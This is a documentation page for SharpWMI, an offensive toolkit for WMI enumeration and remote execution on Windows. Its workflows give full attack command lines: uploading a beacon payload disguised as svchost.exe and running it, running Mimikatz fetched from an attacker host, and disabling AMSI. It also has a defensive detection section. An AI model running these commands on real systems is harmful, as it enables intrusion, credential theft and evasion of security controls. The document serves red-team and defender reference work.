Skip to main content
  _____ _                   __        ____  __ ___
 / ____| |                  \ \      / /  \/  |_ _|
| (___ | |__   __ _ _ __ _ __\ \ /\ / /| |\/| || |
 \___ \| '_ \ / _` | '__| '_ \\ V  V / | |  | || |
 ____) | | | | (_| | |  | |_) |\_/\_/  |_|  |_|___|
|_____/|_| |_|\__,_|_|  | .__/
                        | |
                        |_|

What is SharpWMI?

SharpWMI is a C# implementation of various WMI functionality that provides offensive security practitioners with a native toolkit for Windows Management Instrumentation operations. It enables local and remote WMI queries, remote process creation, VBScript execution, file uploads, and system enumeration—all through the Windows Management Instrumentation interface.
SharpWMI was originally created by @harmj0y and has been enhanced by multiple contributors including Mariusz B. (mgeeky), Evi1cg, Steven Flores, and Justin Bui.

Understanding WMI

Windows Management Instrumentation (WMI) is Microsoft’s implementation of Web-Based Enterprise Management (WBEM), providing a standardized infrastructure for managing and monitoring Windows systems.

Remote Execution

Execute processes and scripts on remote systems via Win32_Process

System Enumeration

Query system information, services, processes, and configurations

Event Subscriptions

Create WMI event subscriptions for delayed or triggered execution

File Operations

Upload files using WMI class properties as a data channel

WMI Attack Surface

Key Capabilities

  • Execution
  • Enumeration
  • File Operations
  • Process Management
Remote Code Execution:
  • Direct process creation via Win32_Process
  • VBScript execution through event subscriptions
  • Command output retrieval
  • MSI installation support
  • AMSI evasion capabilities

Available Actions

SharpWMI provides the following actions organized by category:

Enumeration Actions

query

Execute WMI queries for system enumeration

loggedon

Enumerate logged-on users on remote systems

ps

List running processes with owner information

firewall

Enumerate firewall rules and ports

Execution Actions

exec

Create remote processes via WMI

executevbs

Execute VBScript through WMI event subscriptions

install

Install MSI files remotely

File and Process Actions

upload

Upload files via WMI properties

terminate

Terminate processes by name or PID

Environment Variable Actions

getenv

Retrieve environment variables

setenv

Set environment variable values

delenv

Delete environment variables

Basic Usage Patterns

Local Enumeration

Query the local system without requiring alternate credentials: 
# Query local services
SharpWMI.exe action=query query="select * from win32_service"

# Query local processes
SharpWMI.exe action=query query="select * from win32_process"

# Query AntiVirus products
SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\SecurityCenter2"

Remote Enumeration

Query remote systems with optional credentials: 
# Query remote system (current credentials)
SharpWMI.exe action=query computername=server.domain.com query="select * from win32_service"

# Query with alternate credentials
SharpWMI.exe action=query computername=server.domain.com query="select * from win32_service" username="DOMAIN\user" password="Password123!"

# Query multiple hosts
SharpWMI.exe action=query computername=server1,server2,server3 query="select * from win32_process"

Remote Execution

Execute commands on remote systems: 
# Basic remote execution
SharpWMI.exe action=exec computername=server.domain.com command="powershell.exe -enc ZQBj..."

# Execute with output retrieval
SharpWMI.exe action=exec computername=server.domain.com command="whoami" result=true

# Execute with AMSI evasion
SharpWMI.exe action=exec computername=server.domain.com command="powershell.exe -c Get-Process" amsi=disable result=true

Common Arguments

All remote actions support the following common arguments:
  • Targeting
  • Authentication
  • Execution Options
Target Specification:
ArgumentDescription
computername=HOSTTarget single remote host
computername=HOST1,HOST2,...Target multiple hosts (comma-separated)
(omit computername)Target localhost

Typical Workflows

# 1. Enumerate logged-on users across domain
SharpWMI.exe action=loggedon computername=dc.domain.com,fileserver.domain.com,workstation.domain.com

# 2. Query firewall rules on key systems
SharpWMI.exe action=firewall computername=webserver.domain.com

# 3. List processes on target systems
SharpWMI.exe action=ps computername=admin-workstation.domain.com

# 1. Upload payload to target
SharpWMI.exe action=upload computername=target.domain.com source="beacon.exe" dest="C:\Windows\temp\svchost.exe" amsi=disable

# 2. Execute uploaded payload
SharpWMI.exe action=exec computername=target.domain.com command="C:\Windows\temp\svchost.exe"

# 3. Verify execution
SharpWMI.exe action=ps computername=target.domain.com

# 1. Execute Mimikatz via VBScript
SharpWMI.exe action=executevbs computername=target.domain.com url="http://attacker.com/mimikatz.ps1" eventname="Update" amsi=disable

# 2. Retrieve output via environment variable
SharpWMI.exe action=getenv name=RESULT computername=target.domain.com

# 1. Query network connections (Windows 10+)
SharpWMI.exe action=query computername=target.domain.com query="Select LocalPort,OwningProcess from MSFT_NetTCPConnection" namespace="ROOT\StandardCIMV2"

# 2. Enumerate software installations
SharpWMI.exe action=query computername=target.domain.com query="SELECT * FROM Win32_Product"

# 3. Check for scheduled tasks
SharpWMI.exe action=query computername=target.domain.com query="SELECT * FROM Win32_ScheduledJob"

Detection Considerations

WMI operations generate telemetry that can be detected by defensive tools. Use appropriate operational security measures.
Windows Event Logs:
  • Event ID 4688: Process creation (Win32_Process.Create)
  • Event ID 5857-5861: WMI activity
  • Event ID 5858: WMI permanent event subscriptions (executevbs action)
  • Sysmon Event ID 19-21: WMI event consumer creation
Registry Changes:
  • AMSI evasion modifies HKCU\Software\Microsoft\Windows Script\Settings
  • WMI event subscriptions persist in WMI repository
  • DCOM traffic on port 135 (RPC endpoint mapper)
  • Dynamic RPC ports for WMI communication
  • SMB traffic if using network shares
  • Unusual WMI query patterns
  • Creation of suspicious WMI classes (file upload)
  • ActiveScriptEventConsumer with VBScript payloads
  • Win32_Process creation from remote systems
  • Bulk WMI queries across multiple systems
  • WMI registry modifications for AMSI
  • Monitor WMI event log (Microsoft-Windows-WMI-Activity/Operational)
  • Enable Sysmon with WMI activity rules
  • Alert on WMI event subscription creation
  • Monitor Win32_Process.Create invocations
  • Restrict WMI access via GPO/firewall rules
  • Implement WMI query auditing

AMSI Evasion

SharpWMI includes AMSI evasion capabilities for execution actions:
AMSI evasion works by modifying the registry key HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable to disable AMSI for VBScript and PowerShell. The original value is restored after execution.
Actions supporting AMSI evasion:
  • exec (with result=true)
  • executevbs
  • upload
  • install
Usage: 
SharpWMI.exe action=exec computername=target.domain.com command="powershell -c Get-Process" amsi=disable result=true
The AMSI evasion code was contributed by Steven Flores (0xthirteen) from the SharpMove project.

Prerequisites

  • Windows operating system
  • .NET Framework 3.5 or later
  • Appropriate network access to target systems
Local Operations:
  • Standard user privileges for local queries
  • Administrator for some system queries
Remote Operations:
  • Local administrator on target system
  • WMI permissions on target
  • Network access to RPC/DCOM ports
  • Port 135 (RPC endpoint mapper)
  • Dynamic RPC ports (49152-65535 by default)
  • Port 445 (SMB) may be used for authentication

Technical Background

Win32_Process.Create:
  • Direct synchronous execution
  • Immediate process creation
  • Limited to command-line arguments
  • Used by exec action
WMI Event Subscriptions:
  • Asynchronous delayed execution
  • Supports VBScript payloads
  • Can persist across reboots (if not cleaned up)
  • More complex detection footprint
  • Used by executevbs action
SharpWMI uploads files by:
  1. Creating a temporary WMI class with a string property
  2. Storing base64-encoded file bytes in the property
  3. Using PowerShell on the target to read from WMI and write to disk
  4. Cleaning up the temporary WMI class
This avoids direct SMB file writes but requires PowerShell on the target.
When using result=true with the exec action:
  1. SharpWMI creates an environment variable with encoded command output
  2. The command is wrapped in PowerShell to capture output
  3. Output is XOR-encoded and stored in a WMI environment variable
  4. SharpWMI retrieves and decodes the output
  5. Environment variable is cleaned up
This technique was contributed by Evi1cg (@Ridter).

Authors and Credits

ContributionAuthor
Original SharpWMI implementationWill Schroeder @harmj0y
WMI code-exec output ideaEvi1cg @Ridter
AMSI evasion code (from SharpMove)Steven Flores 0xthirteen
Enhancements, VBS flexibility, file uploadMariusz B. / mgeeky @mariuszbit
Install MSI files featureJustin Bui @slyd0g

Next Steps

Compilation Guide

Build SharpWMI from source

Usage Examples

Practical usage scenarios and examples

WMI Queries

Execute WMI queries for enumeration

Remote Execution

Create remote processes

License

SharpWMI is licensed under the BSD 3-Clause license.
SharpWMI is part of the GhostPack suite of offensive security tools created by @harmj0y.